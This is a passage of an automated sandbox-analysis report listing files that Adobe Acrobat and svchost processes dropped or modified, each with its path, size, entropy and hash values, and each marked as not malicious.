SHA-256: | 754FAA5F830B6532FE96850E494708ABD09360C2C7372A951F97C5579CBB565D |
SHA-512: | 24B6F7A099544BE65C9014318937F55808A66F1009F4C1551FC313870BE323B6080D45F6B9EF2300F448C23D9A843F4B62E560E955E8FCAC4E0AEF1B46C7A4CE |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\svchost.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 16384 |
Entropy (8bit): | 0.08198850485288528 |
Encrypted: | false |
SSDEEP: | 3:f7m1KYef62ilqt/57Dek3JbH6unItallEqW3l/TjzzQ/t:OKzfrR3tu6tmd8/ |
MD5: | 8A7B989A1811D6635228359F9575584B |
SHA1: | 6E84F190098B49508B413D63172914895CED5775 |
SHA-256: | BA2086C9FD2E909C9463535BF3443CD233846DAB7CF685C09EBE287DE653369A |
SHA-512: | 33FBDB8260D137BFF4DBFE11CF6BCEFB0352C6092C180608EF46BE4131D923B11C8763A2A24CEF6A993F4A252CF69C2768E2C508447F9ECA708145DFCDD3C1B6 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.1688243936636775 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPuzNAVq2PcNwi2nKuAl9OmbnIFUtSqVlPOAgZmwsqVlPOAIkwOcNwi2nKZ:7n5vLZHAahFUtZG/L654ZHAaSJ |
MD5: | 130EDC09B97EF22C49C5041B15D60A71 |
SHA1: | 48E7799FA9B2BAD8A0747CBD39BCCC8353FDC43E |
SHA-256: | D6A0B1C38A6E2D4BFAE31DBF3147E8DDEB19539B61B9144C4A291049F1595B4E |
SHA-512: | AE0194E9BADED3796D2CA4458964F0E2E64DEDFCB4C686094F5AB84C18D88EF9584DB061F66FB4D892FDAA603B9EC30B09A045FFEECE01206B6DE5653AD5D37B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 300 |
Entropy (8bit): | 5.1688243936636775 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPuzNAVq2PcNwi2nKuAl9OmbnIFUtSqVlPOAgZmwsqVlPOAIkwOcNwi2nKZ:7n5vLZHAahFUtZG/L654ZHAaSJ |
MD5: | 130EDC09B97EF22C49C5041B15D60A71 |
SHA1: | 48E7799FA9B2BAD8A0747CBD39BCCC8353FDC43E |
SHA-256: | D6A0B1C38A6E2D4BFAE31DBF3147E8DDEB19539B61B9144C4A291049F1595B4E |
SHA-512: | AE0194E9BADED3796D2CA4458964F0E2E64DEDFCB4C686094F5AB84C18D88EF9584DB061F66FB4D892FDAA603B9EC30B09A045FFEECE01206B6DE5653AD5D37B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.128472577931486 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPl89+q2PcNwi2nKuAl9Ombzo2jMGIFUtSqVlPn8JZmwsqVlPn89VkwOcNn:7nu+vLZHAa8uFUtZ5O/L5KV54ZHAa8RJ |
MD5: | 103696C5D0FD32DF6472366CE281D7E6 |
SHA1: | EEB1021892D154B3EA94218EC8343871DAA6BC51 |
SHA-256: | FE5C6897399784EFBBFB7D4858DBAB7CA1338AFD2A6D6311546DEBA27412B188 |
SHA-512: | D4F99766885174C73F9ECCF523067763B1EE00B23CCB4C428780AB84EEC798B904A5EAA7098FA7941BE32896710ADE9C6A82F616F1F4D6EF1368A2E76A7722D6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 344 |
Entropy (8bit): | 5.128472577931486 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPl89+q2PcNwi2nKuAl9Ombzo2jMGIFUtSqVlPn8JZmwsqVlPn89VkwOcNn:7nu+vLZHAa8uFUtZ5O/L5KV54ZHAa8RJ |
MD5: | 103696C5D0FD32DF6472366CE281D7E6 |
SHA1: | EEB1021892D154B3EA94218EC8343871DAA6BC51 |
SHA-256: | FE5C6897399784EFBBFB7D4858DBAB7CA1338AFD2A6D6311546DEBA27412B188 |
SHA-512: | D4F99766885174C73F9ECCF523067763B1EE00B23CCB4C428780AB84EEC798B904A5EAA7098FA7941BE32896710ADE9C6A82F616F1F4D6EF1368A2E76A7722D6 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\0544cc32-66f1-4b65-970d-d3039aeb2c01.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.956654074706278 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sq5hsBdOg2Hkcaq3QYiubSpDyP7E4T3y:Y2sRdsOydMH33QYhbSpDa7nby |
MD5: | C5BCBBBF83C57026E591C411A40FA19E |
SHA1: | 6CE0CEA4F889470474E01BC0230CD0B1681DF69D |
SHA-256: | B31F35EECC058DC9B935D6BC68E08B7D625DBA06FE8950ED3E50489FFD7EB723 |
SHA-512: | 71A858DB5452286F7D66ABF28F1F184BD64C94FA4E225FE6106CA42BC9F46B740D0081023DF6FC155706A0F991BC539D1FB156830E7E3259A8512BEBE49E5ED8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\68778b31-80ae-401b-afa2-b197e6fe1866.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF67b5ae.TMP (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.969814904260269 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqPsBdOg2HSOgcaq3QYiubSpDyP7E4T3y:Y2sRdsRdMHSOL3QYhbSpDa7nby |
MD5: | 7BE9C8316EB1B7252CB363207744A145 |
SHA1: | 57861355BE6541501AED40F896891579DCF473BF |
SHA-256: | B8F7FC35C094B26B18BB46BB695F1D520904FF063398D86C5B06FD3E20F1881D |
SHA-512: | 2C7A056CDC3EF05D5E62822CC0BD835FA80CD06131CB76BF559B1D06F735A279C7DCEDE51F1E3A418596573CC960BAFAA038A45966E8007F671F7B6BFFD885DB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4099 |
Entropy (8bit): | 5.236225317265902 |
Encrypted: | false |
SSDEEP: | 96:CwNwpDGHqPySfkcr2smSX8I2OQCDh28wDtPosbPMz:CwNw1GHqPySfkcigoO3h28ytPxPMz |
MD5: | 6B6EBA4292C56D351A48907ED7CB7224 |
SHA1: | 60DD89F6A840C8EA88649AA4764777F450805000 |
SHA-256: | 9F123C8D52BA277DF12DB9A5EAA0B445979FCA9231AA8703EA02E4798625E7BD |
SHA-512: | 741C8A229763815D70E35A28EF08137361C9635384C4C6135F616579A5A2267F83BBE1295A47171B9C09F6F3F06EE6ECEF754C6B5C762B8E63CCBD0CB105A514 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.145040533137322 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPkBE9+q2PcNwi2nKuAl9OmbzNMxIFUtSqVlPkivJZmwsqVlPkiv9VkwOcy:7n6c+vLZHAa8jFUtZ6S/L6uV54ZHAa8E |
MD5: | 37D561057897875C6A74D091D5FF7EB5 |
SHA1: | FD3E03C739BCCA0979ADFAB5B01405AAEA1F4B8D |
SHA-256: | CD3FAA1364D9608713161C009B738C48F16BBC082ADFE7E5A26DA37BB0E60AE5 |
SHA-512: | CCC121344E05DFF81FD8036B5DE7FC82BFB5F5F59481B9354AE4FB67C199D644DE28F0E954B59995B73B6C5C46A9BEA3F35B13ED3FB3B8CD539D4815EE69B3AB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 332 |
Entropy (8bit): | 5.145040533137322 |
Encrypted: | false |
SSDEEP: | 6:iO4qVlPkBE9+q2PcNwi2nKuAl9OmbzNMxIFUtSqVlPkivJZmwsqVlPkiv9VkwOcy:7n6c+vLZHAa8jFUtZ6S/L6uV54ZHAa8E |
MD5: | 37D561057897875C6A74D091D5FF7EB5 |
SHA1: | FD3E03C739BCCA0979ADFAB5B01405AAEA1F4B8D |
SHA-256: | CD3FAA1364D9608713161C009B738C48F16BBC082ADFE7E5A26DA37BB0E60AE5 |
SHA-512: | CCC121344E05DFF81FD8036B5DE7FC82BFB5F5F59481B9354AE4FB67C199D644DE28F0E954B59995B73B6C5C46A9BEA3F35B13ED3FB3B8CD539D4815EE69B3AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.438445422124202 |
Encrypted: | false |
SSDEEP: | 384:SeDci5GkiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:8ourVgazUpUTTGt |
MD5: | 7A585D96A7CD9132EA87839CD2896177 |
SHA1: | 09605CE6765E8199D1820BB8E98391C722A90F62 |
SHA-256: | 458337B2631F9BB748EFF465A7EF43C6CBCF74CB1C69697D1A79F50EED53AB52 |
SHA-512: | 84053538BD7D5A390C7361457FEC38D09DD56A1D018F0536CFBFFABE03BA3B022FFA4C9D7624F23203DB4DF7FA685F1C71665666EED62C881C6BCCBAB615DD3A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.214662194233929 |
Encrypted: | false |
SSDEEP: | 24:7+tn9H3Ve6wKmqLrzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wm5:7MnJMWmqvmFTIF3XmHjBoGGR+jMz+LhJ |
MD5: | 5E3A2FA5413B0985580FE716AEF5E348 |
SHA1: | BCA07D7190ADEAE4657086EEF6A92A7B9D83D136 |
SHA-256: | 43D494DEF53961E9739A1CE0CAB6584578BFE8BD053D32157E175DEF99E98FE1 |
SHA-512: | 30391F6C0FBFC8885EBC58C193FE1A0DE593AE1894C4C1B6DAB1E945E57534D6139909D223854864F7725AD32FC7DC9DDCBD66C7500D94FF7FD61030147BDF18 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7529698674325394 |
Encrypted: | false |
SSDEEP: | 3:kkFkldBg3lltfllXlE/HT8ka7ttNNX8RolJuRdxLlGB9lQRYwpDdt:kKHPeT8JRNMa8RdWBwRd |
MD5: | 50633B2976F94EF56E63ADCA562B3EE8 |
SHA1: | 88B1BE4DDA56446FDA3CA5385B41CDA4128E2C53 |
SHA-256: | 6ED86BECC52AD070A8FEF4274638BCC258591DA214708423DAA112B621C35E0C |
SHA-512: | 1BECB38A0790E12ACA01A4B1447A5E26E5A736298C5E872DC45CC2E98F14B89EA8A55C9F02DA55836699FBAEBDC3A5CCE8658595DA501AADDA965BBB6B4325EA |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kKBikPL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:wkPiDImsLNkPlE99SNxAhUe/3 |
MD5: | 8B04B0BDE3244D143D6D5FD6D780C34E |
SHA1: | C83DF43E75B179269013153AA62A9EA92D25459D |
SHA-256: | FC8EE019EB108B88DA53F94253634852701CD52AA687032B07CF964C951E4071 |
SHA-512: | AE9A9906310DD91C21993837E117582988C881A578BBE6CA70FEF78FD1436D27640318938FD8C99AB5A3A65C68C3EC0F63F9F071FBD157C18D2AD4EF062421F0 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.367171286964247 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJM3g98kUwPeUkwRe9:YvXKXBTsXJIRsdTeOGsGMbLUkee9 |
MD5: | 323C29CD8F1A6B03AC38C0C8EB78E204 |
SHA1: | DC7AD2891079BF13AE76C341B02959982A2DC25A |
SHA-256: | 6AC079C192DD10A3A553464F984D71943C33892B56CA17D173529350F547BF96 |
SHA-512: | 42902584260C1DF7DDDC2B62785FF31A6EAC638838EA5B917EA7AD38EDCA8CF1E13D5857CB6E3E082B3A00C6E0CEED5EE6D83627DC02184DE9F3591DFD741224 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.303462037021547 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfBoTfXpnrPeUkwRe9:YvXKXBTsXJIRsdTeOGsGWTfXcUkee9 |
MD5: | 8EC709CBB446BEDB63A5E2B354421505 |
SHA1: | B7D339129F56C6E47918DCEF2110D2803582C824 |
SHA-256: | F93A041E8F7FDD273641BB212EBB73412FA720929BA7D5936C11FEB20FD9F369 |
SHA-512: | 59EBE1B7471893001448B31B65407C4A8ECD26B1F6908E72878B6E239B5B9106E758EB1C094E5B17E918F34C2B841C0AC3168C1C1BDE212E3B07DED73FA153B9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.280256094072454 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfBD2G6UpnrPeUkwRe9:YvXKXBTsXJIRsdTeOGsGR22cUkee9 |
MD5: | 43EB24D8C117FD5E18455B49C3EF087D |
SHA1: | 645D374BD6B4EED3DDA4B7B7009273E45B141A88 |
SHA-256: | 857343C07424E1D389A814ED2397C97F31EA528F5B41B8352518E0D27A962C57 |
SHA-512: | 6AEBE6AEB2F5B07A57E1062E35229C99D46A63046A981B76D0AE8C28143F5A5F14182548A90447EFF10A32F3782DA0DEA056EC518CC2BA0300C344F16EB01FD7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.354183200668081 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfPmwrPeUkwRe9:YvXKXBTsXJIRsdTeOGsGH56Ukee9 |
MD5: | E44F17158BC2442755A3FF4F6426B6FA |
SHA1: | 0997E2C8258108CACAE0EDBC0A420F8EB0AFDE74 |
SHA-256: | B83AD19BCFFA9E20D313CEE539D81AFA7AEBAD698279633F0CF4124431CD4FDD |
SHA-512: | 33E6F36036EB6934ABDA5362EFA5308DCD1424F51B5B73E2DE5F526705224F1FC7D72394C580C399B549DDF13AE70A818E825CBC631C5C4A670CACE40F596452 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.6932438254719 |
Encrypted: | false |
SSDEEP: | 24:Yv6XB0JIRmeOupLgE9cQx8LennAvzBvkn0RCmK8czOCCSkw:YvE0GseNhgy6SAFv5Ah8cv/kw |
MD5: | 60994B55921DDB4ADC3D5730D449E320 |
SHA1: | 4E35868AD29041A13ED34B8A2DCE3BD49B94B339 |
SHA-256: | A94A6BC0EA9FA31A5808327B9599588088D4DB4EC58F647F84BECF3A62561839 |
SHA-512: | 35266A76B8359FA5BB0E15078C2478BBA81A51CAA8AE21247ADD5316AD0E8DFB1F31B3C6E58980C83364DD065D789C023EC2FE022CD9826EC85C31E84FA01435 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.293377989608003 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJf8dPeUkwRe9:YvXKXBTsXJIRsdTeOGsGU8Ukee9 |
MD5: | 4216248F9EF57BCFEEB02D0033757E1E |
SHA1: | F9F009FD78AC14E779D3E0E0773B3658B23142F5 |
SHA-256: | 433BD7BF21E79D0D69AC082663F5C7A4C07FD59914F1C55AE869F02BD98FFE5B |
SHA-512: | 8AFE8367465E1D4DF967FA393A1A4F09F7F3AC2287F34ED5264403A1C37FD762F1FA38F659789395EFCA0BF815F1DFFB9F1E95DDE03110FB3A224AA50EF6F8CB |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.296998834748406 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfQ1rPeUkwRe9:YvXKXBTsXJIRsdTeOGsGY16Ukee9 |
MD5: | 2E507A04334D9B7ACA8C298ECED9F751 |
SHA1: | 51D3B5413E2FA9ACE884810034216DEF7CCCC918 |
SHA-256: | AE6EF3CC13C9EEA4F822E09E1E6F6186652529A48B13CAD3CAB1F9EEA5455E4E |
SHA-512: | 4B7B33C414E7354D13BAD956CACB47EC4B3509C061BCDF5F2131DB236D91EC369906B490A8A5D056D646F912D89124656B3BBB412FDE9E58A6625F5E93D8AC74 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.3167178977857805 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXBT9IxXf6WdKV4WsGiIPEeOF0YmDoAvJfFldPeUkwRe9:YvXKXBTsXJIRsdTeOGsGz8Ukee9 |
MD5: | 2083AE65BACF46CE834E6F32EBDE1326 |
SHA1: | B0F6A10D9161BABBF2C9AEE90A2ED176DEC6DEAD |
SHA-256: | 6CF07906C19FF998287C6A51D88A5EFA23D18DA6EC2026D5E75D432B3B3C4878 |
SHA-512: | 34EBF64F34EAF289F8E9B02A9A8F132A95E982E805BA296154CC80565D357FA70073F8153A47165EE001C82733614B7E4C6839803EC64C867693DEE40E171151 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
